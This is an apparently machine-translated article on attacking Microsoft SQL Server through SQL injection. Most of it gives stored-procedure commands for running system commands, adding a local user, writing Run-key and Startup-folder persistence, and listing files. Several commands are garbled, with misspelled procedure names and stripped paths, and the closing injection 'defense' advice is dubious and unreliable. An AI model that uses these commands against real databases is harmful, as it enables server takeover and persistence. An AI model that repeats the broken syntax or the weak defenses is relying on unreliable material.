SQL Server is a widely used database for Small and Medium-sized websites. Due to its powerful functions, it also breeds many security problems. SQL injection attacks have become popular in China for a long time, as a result, SQL Server intrusion techniques are also emerging. Because SQL Server supports multiple statements, I believe that many hackers seldom use methods such as table name guessing when inserting SQL injection into SQL Server, directly turn to the SQL Server stored procedures and functions to quickly obtain permissions. Here I will introduce these hacker skills around the SQL Server system stored procedures and functions.
1. execute system commands
Using the stored procedure, we can quickly and conveniently obtain a shell, such as executing system commands. Storage extension calls are as follows:
Exec master.. xp_shareshell net user ray/add
Xp_cmdshell is a stored procedure of system commands provided by SQL Server. By default, only the SYSADMIN Server role can be executed.
Using the OLE object interface, SQL SERVER provides some functions to access OLE objects: sp_OACREATE and sp_OAMethod. You can use them to call the OLE Control and indirectly obtain a shell. Use SP_OAcreate to call the wscript object. Shell assigns the variable @ shell, and then uses SP_OAMETHOD to call the @ shell attribute run to execute the command.
DECLARE @ shell INT
EXEC SP_OAcreate wscript. shell, @ shell out
EXEC SP_OAMETHOD @ shell, run, null, net user ray/add
The Sandbox mode of access is enabled. By default, the Jet data engine does not support SQL statements such as select shell ("net user ray/add, however, after the sandbox mode of the JET engine is enabled, you can run the command to rewrite the registry using the xp_regwrite stored procedure, and then use OpenRowSet to ACCESS an ACCESS database file that comes with the system, then execute the SQL statement that runs the command.
EXEC master. dbo. xp_regwrite HKEY_LOCAL_MACHINE, SoftWareMicrosoftJet4.0 Engines, SandBoxMode, REG_DWORD, 0
Select * From OpenRowSet (Microsoft. Jet. OLEDB.4.0,; Database = c: windowssystem32iasias. mdb, select shell ("net user ray/add "));
In addition to this, you can also use the SQL proxy to execute commands. Of course, you must first enable the SQL proxy service. By default, this service is disabled. you can use xp_servicecontrol to enable SQLSERVERAGENT, create an SQL scheduled task, and then run the task immediately.
Exec master. dbo. xp_servicecontrol start, SQLSERVERAGENT
Use msdb exec sp_delete_job null, x
Exec sp_add_job x
Exec sp_add_jobstep Null, x, Null, 1, CMDEXEC, cmd/c Dir C:
Exec sp_add_jobserver Null, x, @ servername exec sp_start_job x
2. write arbitrary files and execute commands
Use xp_regwrite to write the registry key and directly write the command to be executed into the RUN startup key.
EXEC master. dbo. xp_regwrite HKEY_LOCAL_MACHINE, SOFTWAREMicrosoftWindowscurrentversionun, shell, REG_SZ, C: windowssystem321_.exe/c net user ray/add
Backup log to startup Item
We can enable the full recovery mode of a database, create a new table, insert the command to back up logs, and finally process the log backup files in batches to the User Startup Folder, the file will be run after the machine restarts.
Alter database msdb set recovery full --
Create table cmd (a image )--
Backup log msdb to disk = c: cmd1 with init --
Insert into cmd (a) values(Bytes )--
Backup log ISTO to disk = C: Documents and SettingsAll Users "start" Menu \ Program Startup \ 1. bat --
Drop table cmd --
3. Users with any permission to execute commands
Under a server role with any permissions, you only need to know the account and password of the SYSADMIN role of the server and use the OPENROWSET macro to execute commands.
Select * from OPENROWSET (SQLoledb, uid = sa; pwd = admin; Address = 127.0.0.1, 7788;, set fmtonly off exec master .. xp_mongoshell dir c :)
1
4. obtain other system information
Calendar directory
Exec master. dbo. xp_dirtree c:
Retrieve sub-Directories
Exec master. dbo. xp_subdirs c:
List available system partitions
Exec master. dbo. xp_availablemedia
Determine whether a directory or file exists
Exec master.. xp_fileexist c: oot. ini
V. SQL Injection defense
1. Modify the table structure. Modify the Data Type of the Administrator's account field, and change the text type to the maximum field 255 (in fact, It is enough. If you want to increase the value, you can select the remarks type ), the password field is also set.
2. Modify the table. Set the account with administrator permissions to ID1 and enter a large number of Chinese characters. It is better to enter more than 100 characters.
3. Place the real administrator password in any location after id2.
The preceding three steps are used to modify the database.
Is the modification finished? Otherwise, you must understand that the ID1 account you created is actually an account with real permissions. Now the computer processing speed is so fast. If you encounter a software that must be computed, this is also insecure. I think most people have come up with a solution, right, as long as you write character restrictions in the administrator login page file! Even if the other party uses this account password with thousands of characters, it will be blocked, and the real password can be unrestricted.